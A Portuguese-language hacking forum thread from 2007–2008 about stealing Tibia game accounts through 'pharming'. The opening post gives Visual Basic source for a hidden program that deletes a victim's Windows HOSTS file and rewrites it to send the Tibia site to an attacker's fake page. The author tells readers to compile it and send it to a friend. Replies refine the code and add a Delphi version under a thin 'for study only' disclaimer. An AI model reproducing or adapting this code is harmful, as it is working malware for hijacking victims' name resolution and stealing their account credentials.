Utilizando a técnina pharming em Tibia - Pegando contas.

Iniciado por colt7r, 30 de Setembro , 2007, 10:07:19 PM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

Imprimir
Ir para o fim Páginas1
Ações

colt7r

30 de Setembro , 2007, 10:07:19 PM
Utilizando a técnina pharming em Tibia - Pegando contas.
by Colt7r

Introdução:
Essa técnica pode ser usada em qualquer site, etc. A técnica de pharming, conhecida como DNS Cache Poisoning, consiste em alterar o arquivo HOSTS, fazendo com que o usuário seja levado a uma página falsa.

O que é necessário:
Não sei se você pode usar essa técnica em hospedagens grátis, mas creio que não. Será necessário um dedicado (ou qualquer porra que tenha um ip próprio... ah sim... você pode usar em sua casa também)

Como fazer?
Bom, primeiro irei explicar a técnica. O arquivo HOSTS (Windows\system32\drivers\etc\hosts) é constituido da seguinte maneira (em cada lihna)

Código Selecionar
IP_1 IP_2

Onde IP_2 é o site que usuário irá entrar, e que irá redirecionar para IP_1.
Exemplo:
Código Selecionar
64.233.169.147 209.85.141.85
Você entra no site do Orkut (209.85.141.85) e é redirecionado para o site do Google (64.233.169.147)

Na prática:
Escrevi um programa em Visual Basic que faz a tarefa. Irei postar o código-fonte e espero que não seja ripado, porque se for eu mando todo mundo tomar no c*u, bando de filho da put4.

Primeiro, Altere a propriedade VISIBLE do form1 para FALSE.
Segundo, altere a propriedade ShowInTaskBar do form1 para FALSE.
Agora, vá em View e depois code e copie e cole o código na janela Code Viewer, fazendo as alterações necessárias.

Código Selecionar
Private Sub Form_Load()
Dim file As Integer
file = FreeFile
On Error Resume Next

'CONFIGURAÇÃO
'/========================================================================\
ip_tibia = "62.146.69.27" 'IP da página do Tibia. Não mexa aqui.          |
'\========================================================================/
'/========================================================================\
ip_servidor_fake = "" 'Coloque aqui o IP do servidor da sua página fake.  |
'\========================================================================/

pharming = "" & ip_servidor_fake & " " & ip_tibia 'Não mexa aqui.

'CRÉDITOS
'/==================================\
'|NAME:                             |
'|PharmingTool for Tibia 1.0        |
'|==================================|
'|PROGRAMMER                        |
'|Colt7r                            |
'|FireHash Security Team            |
'|==================================|
'|CONTACT                           |
'|brasil.red-mexico.com #FireHash   |
'\==================================/

'Apagando arquivo HOSTS.
Kill "C:\Windows\system32\drivers\etc\hosts"

'Escrevendo no arquivo HOSTS. (C:\)
Open "C:\Windows\system32\drivers\etc\hosts" For Output As file
Print #file, pharming
Close file

Open "D:\Windows\system32\drivers\etc\hosts" For Output As file
Print #file, pharming
Close file
End
End Sub

Agora, compile e mande pro seu amiguinho :D

by Colt7r

HadeS

#1
20 de Novembro , 2007, 10:47:21 AM
Ih cara, relaxa.

Se o pessoal se estressasse tanto assim por riparem code esse mundo taria perdido. Mas pra compensar compra um Fox. ;)

HadeS

J.spY

#2
20 de Novembro , 2007, 03:45:43 PM
Dica:

Citar'Apagando arquivo HOSTS.
Kill "%SystemRoot%\system32\drivers\etc\hosts"

'Escrevendo no arquivo HOSTS. (Pasta do OS)
Open "%SystemRoot%\system32\drivers\etc\hosts" For Output As file
Print #file, pharming
Close file

End
End Sub

Não é necessário adicionar mais uma linha de código para testar se a pasta do Windows está em outra unidade, basta usar o %systemroot%, variável de indicação da pasta do OS. Experimente ir em INICIAR > EXECUTAR , digitar isso e veja o que abre.  :)
Importante também caso a pasta do Windows da vítima não esteja com o nome default (Windows).

Se alguém quiser, posto em pascal/delphi também.

[]'s

"...É melhor ficar calado deixando que todos pensem que você é um idiota, do que abrir a boca e não deixar a menor dúvida®..."

Anonymous

#3
10 de Janeiro , 2008, 07:57:56 PM
J.spy poderia postar em delphi, por favor?

Abraços

Obrigado!

J.spY

#4
10 de Janeiro , 2008, 10:03:31 PM
Citarprogram TibiaPharming;

var
ip_original,ip_fake : string;
hosts   : TextFile;

begin
ip_fake:='127.0.0.1'; // IP DA SUA PÁGINA FAKE NO LUGAR DE 127.0.0.1
ip_original:='62.146.78.220'; // IP DO SITE TIBIA.COM [NAO ALTERE]

{-- Localiza e escreve no arquivo. NÃO ALTERE AQUI --}

assignfile(hosts, 'C:\windows\system32\drivers\etc\hosts');
rewrite(hosts);
writeln(hosts,ip_fake + ' ' + ip_original + '## PHARMING LINE ##');
closefile(hosts);

{-- Localiza e escreve no arquivo. NÃO ALTERE AQUI --}

end.

Obs: não me responsabilizo pelo mal uso deste code, apenas para estudo.  ;D

[]'s

"...É melhor ficar calado deixando que todos pensem que você é um idiota, do que abrir a boca e não deixar a menor dúvida®..."

Shady

#5
11 de Janeiro , 2008, 02:12:47 PM
Legal. O problema mesmo é ter o servidor dedicado -_-

 Eu tenho um PoC de pharming aqui no Darkers, deve tar aqui ainda. Depois de executado o PoC, quando a pessoa digita "SHADY" no navegador, ele vai pro google.


Mundus Vult Decipi

Anonymous

#6
11 de Janeiro , 2008, 05:49:54 PM
Muito obrigado cara!

E realmente, o problema é ter servidor dedicado!

:D

Abrss!
Imprimir
Ir para o topo Páginas1
Ações